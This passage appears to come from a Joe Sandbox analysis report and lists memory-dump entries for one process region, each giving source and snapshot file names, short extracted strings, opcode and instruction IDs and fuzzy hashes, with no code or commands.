                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I$HA{I$HA{I
                                                                                                                                                                                                      • API String ID: 0-3810296549
                                                                                                                                                                                                      • Opcode ID: b0e8842e26a53a3200199e7f45213fe3c71e5c5d6df1a2b57fe3ff8a252bdd99
                                                                                                                                                                                                      • Instruction ID: 89e66d8164dd478f91ac4fabb112ea24ff56c7d497583576123e7f48a2e3b6ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0e8842e26a53a3200199e7f45213fe3c71e5c5d6df1a2b57fe3ff8a252bdd99
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 948129B1B1CD0A0FE6A4EE6CE8597B933D1EFA8361B0505BAE45DC72D2DD189C428381
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: #S_H$HA{I$HA{I
                                                                                                                                                                                                      • API String ID: 0-773528311
                                                                                                                                                                                                      • Opcode ID: 6e8090f76af4ac0815c98795e18cc04840d515cecd625c25dc3908ca37d88b5b
                                                                                                                                                                                                      • Instruction ID: 0eb664fe624bb2b0eca1b2f7acf7e2441742d41c81b7a23c13f3834799fd1805
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e8090f76af4ac0815c98795e18cc04840d515cecd625c25dc3908ca37d88b5b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE710D71A1894E8FDFC8EF6CC495AA937E1FFA9381F040079E45AD72A1CA34E8418780
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I$kk
                                                                                                                                                                                                      • API String ID: 0-2850934808
                                                                                                                                                                                                      • Opcode ID: d5bf29a07f335546a32dd89e5fbba4820990abf1cac8774b5c07f52ad69896fb
                                                                                                                                                                                                      • Instruction ID: cab8d3ea41f3a5659bf418fff5716ab7f269317ade9f70731bcc513d3bfc2993
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5bf29a07f335546a32dd89e5fbba4820990abf1cac8774b5c07f52ad69896fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D19DB1B1CA4A4FEB99FF2CC485AB877D1EF68340B0441BAD85EC72D6DD24E8458781
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I$_
                                                                                                                                                                                                      • API String ID: 0-4262683722
                                                                                                                                                                                                      • Opcode ID: d2b253cbf950be01e9e4c895a92ce0c0e8cfc5795f4754d1267019653fb7f30c
                                                                                                                                                                                                      • Instruction ID: 62e711188a0e87065bb7a99c6c95179511e6ce6cebc836cd0fbc4c5ebe697ea8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2b253cbf950be01e9e4c895a92ce0c0e8cfc5795f4754d1267019653fb7f30c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A43145A2A1D6560FD316BF7CE8965E93F90DF42264B0841FAE498CB5D3D808984683D5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I
                                                                                                                                                                                                      • API String ID: 0-3447132464
                                                                                                                                                                                                      • Opcode ID: f60c848b2d9b5b61942915d2ab13f55a73cdb62a8e3e466254591f28e7c56acd
                                                                                                                                                                                                      • Instruction ID: 22a39c9e3f9f643e230aba254a61150e358e897f2a4f8a32640f14649aaac8fd
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: #CM_^
                                                                                                                                                                                                      • API String ID: 0-2311673530
                                                                                                                                                                                                      • Opcode ID: 71dd7cd36e10f38158aa7f05aeb52b8b9c2fba5be7fa2abb8cf07c219eca7ee0
                                                                                                                                                                                                      • Instruction ID: c35e67de48a00d0bdf76b9de8cbc32a5c286ce9216ea9d606efe949512855449
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71dd7cd36e10f38158aa7f05aeb52b8b9c2fba5be7fa2abb8cf07c219eca7ee0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0211906170D94B5FDB8AEF3CC0517686791EF4B38475801F9C449CB6D6CD38A8458761
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: #CM_^
                                                                                                                                                                                                      • API String ID: 0-2311673530
                                                                                                                                                                                                      • Opcode ID: 05f297505d4fb0cc9cb396ebdd9fddade48cd54866cb97186b44824c1201554f
                                                                                                                                                                                                      • Instruction ID: 8e061fd0b63002e2e7b8c7f4918346b817d4e482c03d5b098922564a819eacc0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05f297505d4fb0cc9cb396ebdd9fddade48cd54866cb97186b44824c1201554f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52113A6091D6874FE64AEF3CD1917643791AF4B3C8B8401F9C419DB5E3CD297898C721
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 525890ad9e2de1eefb0a0b05179a7ecd070902b394e34dfb97f760080ac2d467
                                                                                                                                                                                                      • Instruction ID: 9d5f5d30352a9a78733151190fff739bc20349e574531362c26770b0daa9c19d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 525890ad9e2de1eefb0a0b05179a7ecd070902b394e34dfb97f760080ac2d467
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71C11393B0D5930AE3027E7CFA550FC7B91EFA127AB0841BBD59C8B8C3DD18A44A42D5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b6e0af0b22fe54e478e0e656108aff6c0cb45971958e69092573c3df097b4313
                                                                                                                                                                                                      • Instruction ID: 7ffafeb9c7bd696d04990a67d473420a662a4c84224fec199fec8f87862c668a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6e0af0b22fe54e478e0e656108aff6c0cb45971958e69092573c3df097b4313
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7A15AA2A0EA820FE75AAF7CDC551647F91EFD5A6471803FBD088C71D7EC14A80683D1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 90a9a7840eb21044ed59249bf19d075d5f0c4d79d621a46781a72b55fdc113b1
                                                                                                                                                                                                      • Instruction ID: 5bffc6bd11ffcae354cef1913f3c58ad72acb672e993b4279f53b107b8076e9b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90a9a7840eb21044ed59249bf19d075d5f0c4d79d621a46781a72b55fdc113b1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7381387160DA464FE399AF3CD88567077E0FF96360B1802BED489C71A7DA29F842C751
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 912f3d1296fe2b92b2f818caa0366e4bb7fff4c7290cb3e167487f77f1ecdc2b
                                                                                                                                                                                                      • Instruction ID: b6b4a7f7cd6fb16af9e215d1f63a02646667b77ffbf9f59b540f17db5550135b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 912f3d1296fe2b92b2f818caa0366e4bb7fff4c7290cb3e167487f77f1ecdc2b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C081E26260DA8A4FD396EF3CC9949647FE1EF9734030941FAD498CB1E3D928EC458391
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 37b4ccc89f09d7b0e7d86882747e4fb6c35eb8feff97b7f588cfea3e0f577ab2
                                                                                                                                                                                                      • Instruction ID: 48f4c367ee4b90cc8473e20403559fb6ac5924d6f539744ec975d0427ee2b79e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37b4ccc89f09d7b0e7d86882747e4fb6c35eb8feff97b7f588cfea3e0f577ab2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F7101B1A0DA8A4FE799EF3CC8557697BE1EF95740F0402BED44DC7292CD28AC018761
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 5d3db30ad267b8d34cfbcb35dd65d15cc6cbd1b79f02aaf239441067e74e3380
                                                                                                                                                                                                      • Instruction ID: 6a357f90636a4665d2b59a86af9a457a97454e01ca3c1caf2b648d2022fdc98a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3db30ad267b8d34cfbcb35dd65d15cc6cbd1b79f02aaf239441067e74e3380
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51F17161DE0B4FE758AE6CD884A7173E0EFA9350B140679D49EC3292DA29F887C781
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 468d26402a4650843270a3515f831305fdaeb7118a165f441e1480c1075ecd86
                                                                                                                                                                                                      • Instruction ID: 397581b59f015afed7964c7140629d0f119390b174c382a8319e1c65c8c9a758
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 468d26402a4650843270a3515f831305fdaeb7118a165f441e1480c1075ecd86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A251CA61B1C95A4FEB99EE2DD4559B937D1EF58750F0402AAF44EC3297CD28E84183C1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 1757d66ea4c8b66830f1e68c0232dff8eb922a9f2ecc1d107d0db6add46411c5
                                                                                                                                                                                                      • Instruction ID: bc221208fc423aa3568ec9789ef6086b03cd3ae8bd1f9e2fa9a481a80f1c1494
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1757d66ea4c8b66830f1e68c0232dff8eb922a9f2ecc1d107d0db6add46411c5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F31067090994A9FDB94EF2CC589AA877E1FF59754F0102B9E40DD72A1CA39E880CB50
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 62e651813aa2ab7d746f04f12d30f7d5716e4fef00aad56271d9b8012a2baae4
                                                                                                                                                                                                      • Instruction ID: 0aab1f176a80ed936e63e5627a3c746f2972f3346bc861439268dd3fc254bc4e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62e651813aa2ab7d746f04f12d30f7d5716e4fef00aad56271d9b8012a2baae4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9711B77260DE4A0FE798DE2CD856A717BD5EF9625070401BAE44CC71D3DD29E841C350
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 509b489ceb7ef001a38d4a43b04f4992c52b4930945586c4fbed36b759ec241e
                                                                                                                                                                                                      • Instruction ID: 0c655bc02bc16a767fe9baab9120ef65a8630a58aa171dfa3bb658f9b39787f9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 509b489ceb7ef001a38d4a43b04f4992c52b4930945586c4fbed36b759ec241e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B213DB0E19A5A8FEBA9EF3CCC457A873A1EF44341F1001FDE05DD2191CE399A818B14
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 6d8d9f81d0e4f9e9793b830989f03cfbb373fd4391ba1d9038cf223277ad535e
                                                                                                                                                                                                      • Instruction ID: d8e24bf24e8f3469812e8fdb22195103d41b9a312868e62e744e377f63e60024
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8d9f81d0e4f9e9793b830989f03cfbb373fd4391ba1d9038cf223277ad535e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE012842B0E06A05EA127A7CF1915FD3F41DF4523EB0D42B7E4DC898D3DC89A84D41D9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 0de0551d2718c6ac1e34aa0d85b669224b15f4421b430ddc98331dcd78070fc4
                                                                                                                                                                                                      • Instruction ID: c8190ffe1933237a9b67276c56d6b2a32cfdb3eca08af21e3c7c2d6f0376fc6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0de0551d2718c6ac1e34aa0d85b669224b15f4421b430ddc98331dcd78070fc4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0901F9A270EA470FF69B663CF8162B96BC0CB9627131551BBD48EC71D3DC099C830295
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 03d0e172cf46242a1169b36acfbf7a4e4f85d5298b4cf23ed111e8eefca3222d
                                                                                                                                                                                                      • Instruction ID: 0605ee795e04682ccd2cc64562015c962896e69575fb95c836bb653b4533eecf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03d0e172cf46242a1169b36acfbf7a4e4f85d5298b4cf23ed111e8eefca3222d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D301DEB151C6464FEBA4EF2DC5457A47BD0FF09300F4801FAD098CB1D2CA1A9C458781
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 7abf957a2278454c58faf7652ef6dc24f3b1954ed3da12464714ee41d4db72a8
                                                                                                                                                                                                      • Instruction ID: 7dbf50a6a6b05d8054de5e14b492ff72b86640b856eb4d2bfe9965ea52332c4e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7abf957a2278454c58faf7652ef6dc24f3b1954ed3da12464714ee41d4db72a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF0C8C2A0EA8B1FE3966A7C99962B46B85DB9916171841B7D04CC62D3DC484C8743E2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ea580088ee37cee6efe4cc6de1103e009682504e9b30a6ba4e38f9f941bf8556
                                                                                                                                                                                                      • Instruction ID: 7162dc0e534d0861259ac25f40d814c3f4ef6238bcf904b86204e3c00c37c237
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea580088ee37cee6efe4cc6de1103e009682504e9b30a6ba4e38f9f941bf8556
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C301A261A2DA0B4FDA9DFE3CD09096A73E1FFA8340744057AD459C3685DD24E8428381
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a0ac36e12542ab6fea39ff5be1669e3d39b9e30394b70c5c136a6c63f6d5cb54
                                                                                                                                                                                                      • Instruction ID: 81a037df7de420486d9adbf3cf72c6c98dee485fc03b9d102826ded5f334c78c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0ac36e12542ab6fea39ff5be1669e3d39b9e30394b70c5c136a6c63f6d5cb54
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001818581EAC71FD3636BBC69202A16FA48F8316571D01E7E0E8CB0CBD90C5895C3A6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a8925249790f00633499a79c2ae2c1364307829677f87eedc7fe6189e90bdee5
                                                                                                                                                                                                      • Instruction ID: 100cc86aa5109bb056d4976b7680096aff4017d0826b3237555c3972357fea71
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8925249790f00633499a79c2ae2c1364307829677f87eedc7fe6189e90bdee5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1801ADB091D78E4FDB46EF3888180A97FB0FF15200B4004ABD869C71A2DA7588148740
Memory Dump Source
• Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                                                                      • Instruction ID: 2d753b83a63e190afcd2cf550962048f1f8263bac89cc51bf002f02cbfacda74
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAC01232A0880D8E8F80EE9CA0016ECB7A0EB89221F041033E11CE2140CE24145047A0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 0a5f752df2c09eb0c943833d55dc258bfdd94beac84bacd88f350b69829a59e3
                                                                                                                                                                                                      • Instruction ID: c53be6ebf7de586e7d1d321751b1f824bafab1a2e2ea60e549a55208ed1b2370
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5f752df2c09eb0c943833d55dc258bfdd94beac84bacd88f350b69829a59e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59B0128080AA5344DDCA2131CA012F82AD1CF411D0FC808F4FDCC49053D80C37DB0310